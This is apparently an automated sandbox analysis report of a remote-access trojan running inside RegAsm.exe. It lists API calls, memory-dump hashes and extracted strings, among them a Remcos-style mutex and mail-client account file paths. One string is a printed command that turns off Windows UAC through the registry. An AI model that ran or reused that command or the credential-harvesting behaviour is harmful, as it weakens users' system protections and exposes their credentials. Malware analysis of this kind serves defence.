                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1000104B
                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 10001061
                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 10001075
                                                                                                                                                                      • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 10001090
                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 100010B8
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.643127619.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.643112844.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.643127619.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_10000000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: lstrlen$AttributesFilelstrcat
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3594823470-0
                                                                                                                                                                      • Opcode ID: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                                                                                                                                      • Instruction ID: f5da6160d3db499da992451a69b84f141dc83571de07cfa19ff2ab3d93a8fd2c
                                                                                                                                                                      • Opcode Fuzzy Hash: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                                                                                                                                      • Instruction Fuzzy Hash: DB21E5359003289BEF10DBA0DC48EDF37B8EF44294F104556E999931A6DE709EC5CF50
                                                                                                                                                                      APIs
                                                                                                                                                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD19
                                                                                                                                                                      • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A41F,00000000), ref: 0041AD2D
                                                                                                                                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD3A
                                                                                                                                                                      • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD6F
                                                                                                                                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD81
                                                                                                                                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD84
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 493672254-0
                                                                                                                                                                      • Opcode ID: f0f747c63b9e12e72378a2591e571a85e7fda5b6d41ee6cbe89889ce84539f3f
                                                                                                                                                                      • Instruction ID: 77e668261cf9ee2bd18e5a0e87596c089765e66a1be6d3c981f75cbf7ed2a716
                                                                                                                                                                      • Opcode Fuzzy Hash: f0f747c63b9e12e72378a2591e571a85e7fda5b6d41ee6cbe89889ce84539f3f
                                                                                                                                                                      • Instruction Fuzzy Hash: A7016D311462157AD6111B34AC4EFFB3B6CDB02772F10032BF625965D1DA68CE8195AB
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,10003518,100023F1,10001F17), ref: 10003864
                                                                                                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003872
                                                                                                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000388B
                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,10003518,100023F1,10001F17), ref: 100038DD
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.643127619.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.643112844.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.643127619.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_10000000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3852720340-0
                                                                                                                                                                      • Opcode ID: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                                                                                                                                      • Instruction ID: 2a33bd680f99e964f7cdf1ea0b0e713dcb61597015083b2077453114c578dac0
                                                                                                                                                                      • Opcode Fuzzy Hash: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                                                                                                                                      • Instruction Fuzzy Hash: 0F012432608B225EF207D7796CCAA0B2BDDDB096F9B20C27AF510940E9EF219C009300
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                                                                                                                                                      • _free.LIBCMT ref: 10005B2D
                                                                                                                                                                      • _free.LIBCMT ref: 10005B55
                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B62
                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                                                                                                                                                      • _abort.LIBCMT ref: 10005B74
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.643127619.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.643112844.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.643127619.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_10000000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast$_free$_abort
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3160817290-0
                                                                                                                                                                      • Opcode ID: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                                                                                                                                      • Instruction ID: 6ab9c425fee0725613b21b3b36aaf5e4259b246f4cabca8c388d0d7fb541d563
                                                                                                                                                                      • Opcode Fuzzy Hash: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                                                                                                                                      • Instruction Fuzzy Hash: 8FF0A47A508911AAF212E3346C4AF0F36AACBC55E3F264125F918A619DFF27B9024174
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                                                                      • _free.LIBCMT ref: 004482CC
                                                                                                                                                                      • _free.LIBCMT ref: 004482F4
                                                                                                                                                                      • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                                                                                                                      • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                                                                      • _abort.LIBCMT ref: 00448313
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast$_free$_abort
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3160817290-0
                                                                                                                                                                      • Opcode ID: 0dc6b6a3e4ae5b17dec3dccad88ee1f92140bcc2d5108ccd544116d6be2417e2
                                                                                                                                                                      • Instruction ID: 8d34d3ffa9a8a5ca7629c839d325bdddc3ef58a145117f7ac1d0225592351e3a
                                                                                                                                                                      • Opcode Fuzzy Hash: 0dc6b6a3e4ae5b17dec3dccad88ee1f92140bcc2d5108ccd544116d6be2417e2
                                                                                                                                                                      • Instruction Fuzzy Hash: 8EF0A435101B006BF611772A6C06B6F26599BD3B69F36042FFD18962D2EF6DCC42816D
                                                                                                                                                                      APIs
                                                                                                                                                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB46
                                                                                                                                                                      • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB5A
                                                                                                                                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB67
                                                                                                                                                                      • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB76
                                                                                                                                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB88
                                                                                                                                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB8B
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 221034970-0
                                                                                                                                                                      • Opcode ID: 754c0925ec177a5049a93b7fce8159a8319844bdb89c9ef35b94d9fd17db8e33
                                                                                                                                                                      • Instruction ID: 443f58cffa4f299642b313368f914f767bd977a6fac550f0ec2f38f013616b5a
                                                                                                                                                                      • Opcode Fuzzy Hash: 754c0925ec177a5049a93b7fce8159a8319844bdb89c9ef35b94d9fd17db8e33
                                                                                                                                                                      • Instruction Fuzzy Hash: E4F0F631541318BBD7116F259C49DFF3B6CDB45B62F000026FE0992192EB68DD4595F9
                                                                                                                                                                      APIs
                                                                                                                                                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC4A
                                                                                                                                                                      • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC5E
                                                                                                                                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC6B
                                                                                                                                                                      • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC7A
                                                                                                                                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8C
                                                                                                                                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8F
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 221034970-0
                                                                                                                                                                      • Opcode ID: b5aa101f668b8370ae1db4d78aefdcb1539b90a750a7e22220e005daec647db2
                                                                                                                                                                      • Instruction ID: 80b71cf000cc834045a6d48b23744411b71cc7e49355023a2f572df053a73ec4
                                                                                                                                                                      • Opcode Fuzzy Hash: b5aa101f668b8370ae1db4d78aefdcb1539b90a750a7e22220e005daec647db2
                                                                                                                                                                      • Instruction Fuzzy Hash: 73F0C231501218ABD611AF65AC4AEFF3B6CDB45B62F00002AFE0992192EB38CD4595E9
                                                                                                                                                                      APIs
                                                                                                                                                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACB1
                                                                                                                                                                      • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACC5
                                                                                                                                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACD2
                                                                                                                                                                      • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACE1
                                                                                                                                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF3
                                                                                                                                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF6
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 221034970-0
                                                                                                                                                                      • Opcode ID: d2f399c3bcd0f1044f14c411125fc5822346b4401d7891a80fcd35a5d0c32c00
                                                                                                                                                                      • Instruction ID: 4c72e2560426042a93d841201029be6eaa37955ba2c7d49e75f16ae618c5df44
                                                                                                                                                                      • Opcode Fuzzy Hash: d2f399c3bcd0f1044f14c411125fc5822346b4401d7891a80fcd35a5d0c32c00
                                                                                                                                                                      • Instruction Fuzzy Hash: 85F0F631501228BBD7116F25AC49DFF3B6CDB45B62F00002AFE0992192EB38CD46A6F9
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                                                                                                                        • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,?), ref: 10001EAC
                                                                                                                                                                        • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                                                                                                                        • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                                                                                                                        • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
                                                                                                                                                                      • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1000122A
                                                                                                                                                                        • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001855
                                                                                                                                                                        • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001869
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.643127619.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.643112844.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.643127619.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_10000000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                                                                                                                      • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                                                                                                      • API String ID: 4036392271-1520055953
                                                                                                                                                                      • Opcode ID: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                                                                                                                                      • Instruction ID: e2b7c7e1c3038021adfe9ab266432482c710e64fc4cfb1bae4cfd9c1521b4980
                                                                                                                                                                      • Opcode Fuzzy Hash: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                                                                                                                                      • Instruction Fuzzy Hash: 4B21D579E142486AFB14D7A0EC92FED7339EF80754F000556F604EB1D5EBB16E818758
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ClassCreateErrorLastRegisterWindow
                                                                                                                                                                      • String ID: 0$MsgWindowClass
                                                                                                                                                                      • API String ID: 2877667751-2410386613
                                                                                                                                                                      • Opcode ID: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                                                                                                                                                      • Instruction ID: e808ecd18ef19f47bd472c0c6462b34ef8490c58390ad3ae495a6aa035ed2a4b
                                                                                                                                                                      • Opcode Fuzzy Hash: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                                                                                                                                                      • Instruction Fuzzy Hash: 1F0125B1D00219ABDB00DFA5EC849EFBBBCEA08355F40453AF914A6241EB7589058AA4
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004077D6
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 004077E5
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 004077EA
                                                                                                                                                                      Strings
                                                                                                                                                                      • C:\Windows\System32\cmd.exe, xrefs: 004077D1
                                                                                                                                                                      • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004077CC
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandle$CreateProcess
                                                                                                                                                                      • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                                                                                                                      • API String ID: 2922976086-4183131282
                                                                                                                                                                      • Opcode ID: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                                                                                                                                                      • Instruction ID: 1887ccd63cb29ce90d3c4a9dee080bc6fb52b3336ad705aa4023eed0db3a7680
                                                                                                                                                                      • Opcode Fuzzy Hash: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                                                                                                                                                      • Instruction Fuzzy Hash: 04F09672D4029C76CB20ABD7AC0EEDF7F3CEBC5B11F00051AF904A2045DA745400CAB5
                                                                                                                                                                      Strings
                                                                                                                                                                      • Rmc-0BYJUE, xrefs: 00407715
                                                                                                                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 004076FF
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Rmc-0BYJUE
                                                                                                                                                                      • API String ID: 0-1270195698
                                                                                                                                                                      • Opcode ID: 9875d9faf70918787a925bf8ffd0fe05ff0f1e0d4d07a7049234b56cd1ae4be9
                                                                                                                                                                      • Instruction ID: 5ffff352cfcc2e87221e4fa572a01d73507d198e899e6baa5594ec663d9dd15d
                                                                                                                                                                      • Opcode Fuzzy Hash: 9875d9faf70918787a925bf8ffd0fe05ff0f1e0d4d07a7049234b56cd1ae4be9
                                                                                                                                                                      • Instruction Fuzzy Hash: 8DF02BB0E04600EBCB1477345D296AA3656A780397F40487BF507EB2F2EBBD5C41871E
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 004433FA
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,?,?,0044338B,?,?,0044332B,?), ref: 0044340D
                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 00443430
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                                                                                      • Opcode ID: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                                                                                                                                                      • Instruction ID: d7bd46dfab834bb5d48edea7818df211002af85bf4a2e706b61bd78119be3437
                                                                                                                                                                      • Opcode Fuzzy Hash: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                                                                                                                                                      • Instruction Fuzzy Hash: 4EF04931900208FBDB159F65DC45B9EBF74EF04753F0040A5F805A2251DB758E40CA99
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
                                                                                                                                                                      • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00405140
                                                                                                                                                                        • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                                                                                                                      • String ID: KeepAlive | Disabled
                                                                                                                                                                      • API String ID: 2993684571-305739064
                                                                                                                                                                      • Opcode ID: 1fd388f523b344ad3ce7bacd9f737274470046df98bc8577e1acfe76f453cfe4
                                                                                                                                                                      • Instruction ID: dc79248355977efa3495ea8e96f68553e1f2867eb32bbe7dc6984d352a193ca4
                                                                                                                                                                      • Opcode Fuzzy Hash: 1fd388f523b344ad3ce7bacd9f737274470046df98bc8577e1acfe76f453cfe4
                                                                                                                                                                      • Instruction Fuzzy Hash: 5DF06D71904711BBDB203B758D0AAAB7E95AB06315F0009BEF982916E2D6798C408F9A
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                                                      • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041AE83
                                                                                                                                                                      • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE91
                                                                                                                                                                      • Sleep.KERNEL32(00002710), ref: 0041AE98
                                                                                                                                                                      • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AEA1
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                                                                                                                      • String ID: Alarm triggered
                                                                                                                                                                      • API String ID: 614609389-2816303416
                                                                                                                                                                      • Opcode ID: 715f6b18c41aa76fa9a4930845716c072d9d24f9be949641e6571375284beb95
                                                                                                                                                                      • Instruction ID: 264e31dd7f8ae4a58c3cd97330858728e5483d82e525179ed11d996d756d41c5
                                                                                                                                                                      • Opcode Fuzzy Hash: 715f6b18c41aa76fa9a4930845716c072d9d24f9be949641e6571375284beb95
                                                                                                                                                                      • Instruction Fuzzy Hash: 3EE0D826A40220779A10337B6D0FD6F3D29CAC3B2570100BFFA05660C2DD540C01C6FB
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CE7E), ref: 0041CDF3
                                                                                                                                                                      • GetConsoleScreenBufferInfo.KERNEL32 ref: 0041CE00
                                                                                                                                                                      • SetConsoleTextAttribute.KERNEL32(00000000,0000000C), ref: 0041CE0D
